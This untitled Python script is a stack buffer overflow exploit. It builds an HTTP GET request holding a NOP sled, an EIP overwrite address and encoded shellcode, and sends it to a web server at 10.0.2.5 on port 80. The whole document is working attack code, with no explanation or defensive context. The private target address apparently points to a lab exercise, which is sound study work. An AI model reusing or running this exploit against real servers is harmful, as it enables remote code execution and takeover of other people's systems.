Untitled

#!/usr/bin/python
import socket
target_address="10.0.2.5"
target_port=80
buffer = "GET "
buffer+= "\x90" * 1787
buffer+= "\x65\x82\xA5\x7C" # EIP Overwrite
buffer+= "\x90" * 16
buffer+=
("\xdb\xdf\x31\xc9\xd9\x74\x24\xf4\xba\x6d\xb9\xb7\xc1\x5e\xb1"
"\x49\x31\x56\x17\x03\x56\x17\x83\xab\xbd\x55\x34\xcf\xd4\x72"
"\xfa\xc7\xd0\x7a\xfa\xe8\x43\x0e\x69\x32\xa0\x9b\x37\x06\x23"
"\xe7\xb2\x0e\x32\xf7\x36\xa1\x2c\x8c\x16\x1d\x4c\x79\xe1\xd6"
"\x7a\xf6\xf3\x06\xb3\xc8\x6d\x7a\x30\x08\xf9\x85\xf8\x43\x0f"
"\x88\x38\xb8\xe4\xb1\xe8\x1b\x2d\xb0\xf5\xef\x72\x1e\xf7\x04"
"\xea\xd5\xfb\x91\x78\xb6\x1f\x27\x94\x4b\x0c\xac\xe3\x27\x68"
"\xae\x92\x74\x41\x15\x30\xf1\xe1\x99\x32\x45\xea\x52\x34\x59"
"\x5f\xef\xf5\x69\xc1\x98\x7b\x27\xf3\xb4\xd4\x48\xdd\x23\x86"
"\xd0\x8a\x98\x1a\x74\x3c\xac\x68\xdb\x96\xad\x5d\x8b\xdd\xbf"
"\xa2\x70\xb2\xc0\x8d\xd9\xbb\xda\x54\x64\x56\x2c\x9b\x33\xc3"
"\x2f\x64\x6b\x7b\xe9\x93\x7e\xd1\x5e\x5b\x56\x79\x32\xf0\x05"
"\x3d\xe7\xb5\xfa\x3e\xd7\x52\x3c\x68\xbc\xc1\xda\x01\x3c\xbd"
"\x44\x81\xb7\x20\x1d\x4d\x24\x5b\xb7\xee\xe3\x63\x11\x84\x1b"
"\xcd\xc8\xa6\xcc\x8b\x98\x3c\x8b\x3b\x3f\xd0\x39\xec\xe6\x03"
"\x72\x85\xff\x3e\xce\x1f\x1d\x8f\x0e\xec\x4b\x65\x07\xee\x75"
"\xc4\x35\xef\xcb\xe5\xc8\x75\xf3\x5e\x79\x22\x6b\xd3\x80\x86"
"\x7d\xec\x08\xc1\x7e\xc4\xa8\x46\xd2\xb8\x1f\x38\xb8\x3b\xf1"
"\xeb\x69\x6d\x0e\xdb\xf9\x20\x29\xd9\x37\x69\x35\x34\xad\x71"
"\x36\x8e\xce\x5e\xa1\x16\x49\x99\x4b\x26\xdc\x21\x53\x0e\xe1"
"\x5d\x57\x50\xcd\xca\x57\x25\xe9\x55\xcb\xc5\x27\x96\x3b\x33")
buffer+= " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()